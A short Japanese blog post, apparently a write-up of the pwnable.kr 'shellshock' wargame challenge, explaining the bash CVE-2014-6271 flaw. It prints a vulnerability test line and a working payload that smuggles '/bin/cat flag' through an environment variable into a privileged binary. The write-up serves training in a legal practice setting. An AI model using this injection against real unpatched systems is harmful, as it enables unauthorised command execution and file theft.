気まぐれブログ(日記・技術記事・研究のことなど)

気まぐれに更新します.温かい目で見ていただければ...

pwnable.kr writeup [shellshock]

この問題はおそらく知らないと解けない問題です...

問題

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)


ssh shellshock@pwnable.kr -p2222 (pw:guest)

解説

これはCVE-2014-6271というbash脆弱性をつく問題です.

以下のコマンドを打ったときに, 以下のような2つの結果が出たらアウトです(脆弱性があるということです).

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

この脆弱性を利用して, 「echo vulnerable」の部分に任意のシェルコードを埋め込むことができます.

したがってこの問題では, 以下のようなコマンドを打てばflagをgetできます.

$ env x='() { :; }; /bin/cat flag' ./shellshock